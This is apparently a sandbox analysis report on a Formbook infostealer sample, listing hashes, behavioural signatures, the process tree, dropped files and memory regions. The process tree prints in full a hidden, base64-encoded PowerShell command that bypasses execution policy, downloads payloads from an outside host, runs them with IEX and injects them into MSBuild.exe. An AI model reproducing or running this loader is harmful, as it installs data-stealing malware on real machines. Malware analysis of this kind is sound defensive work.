Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    13-07-2020 14:36

General

  • Target

    fdppo.exe

  • Size

    101KB

  • MD5

    082348ffb2977a0762e3e5d6f4a47ff4

  • SHA1

    a63f12bba792fd01307373a7565b96549eb9f3c8

  • SHA256

    8f9fcdd00e43b8845139ba38f9d4f164e526736578eab199e7f7af5d8179f01c

  • SHA512

    ac00b157a3ae8af9502658c2fa72d80eb871f4ca9ee6b36393c526fbe0d35383855633bc871623c3088f3cdbd75a537b52ef24d8d1995353896637c3a27cf91c

Malware Config

Signatures

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Adds Run entry to policy start application 2 TTPs 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Checks whether UAC is enabled
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SendNotifyMessage
    PID:1336
    • C:\Users\Admin\AppData\Local\Temp\fdppo.exe
      "C:\Users\Admin\AppData\Local\Temp\fdppo.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwB6AC4AegB6AC4AaAB0AC8ATgBlADYANABvAC4AdAB4AHQAJwApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAqACIALAAgACIANAA4ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACAAIgA3ADgAIgApAHwASQBFAFgAOwBbAEIAeQB0AGUAWwBdAF0AJABmAD0AWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEkAbgB0AGUAcgBhAGMAdABpAG8AbgBdADoAOgBDAGEAbABsAEIAeQBuAGEAbQBlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAHCBgAE4AYABlAGAAVABgAC4AYABXAGAAZQBgAEIAYABDAGAAbABgAGkAYABlAGAATgBgAFQAHSApACwAJAByAGUAZwAsAFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBDAGEAbABsAFQAeQBwAGUAXQA6ADoATQBlAHQAaABvAGQALAAnAGgAdAB0ACcAKwBbAEMAaABhAHIAXQA4ADAAKwAnAHMAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AegAuAHoAegAuAGgAdAAvAFMAeABUAHAASQAuAHQAeAB0ACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA
        3⤵
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetThreadContext
        • Blacklisted process makes network request
        PID:1608
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: MapViewOfSection
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetThreadContext
          PID:1084
    • C:\Windows\SysWOW64\colorcpl.exe
      "C:\Windows\SysWOW64\colorcpl.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • System policy modification
      • Suspicious behavior: MapViewOfSection
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetThreadContext
      • Adds Run entry to policy start application
      • Drops file in Program Files directory
      PID:1828
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        3⤵
          PID:1852
        • C:\Program Files\Mozilla Firefox\Firefox.exe
          "C:\Program Files\Mozilla Firefox\Firefox.exe"
          3⤵
            PID:1636

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

      • C:\Users\Admin\AppData\Roaming\057903T3\057logim.jpeg

      • C:\Users\Admin\AppData\Roaming\057903T3\057logrf.ini

      • C:\Users\Admin\AppData\Roaming\057903T3\057logri.ini

      • C:\Users\Admin\AppData\Roaming\057903T3\057logrv.ini

      • memory/1084-4-0x000000000041E200-mapping.dmp

      • memory/1084-3-0x0000000000400000-0x000000000042D000-memory.dmp

        Filesize

        180KB

      • memory/1608-0-0x0000000000000000-mapping.dmp

      • memory/1636-20-0x000000013FB80000-0x000000013FC13000-memory.dmp

        Filesize

        588KB

      • memory/1636-19-0x0000000000000000-mapping.dmp

      • memory/1828-18-0x0000000003A30000-0x0000000003B1D000-memory.dmp

        Filesize

        948KB

      • memory/1828-17-0x00000000009A0000-0x0000000000A63000-memory.dmp

        Filesize

        780KB

      • memory/1828-15-0x0000000000A80000-0x0000000000A98000-memory.dmp

        Filesize

        96KB

      • memory/1828-14-0x0000000000000000-mapping.dmp

      • memory/1852-16-0x0000000000000000-mapping.dmp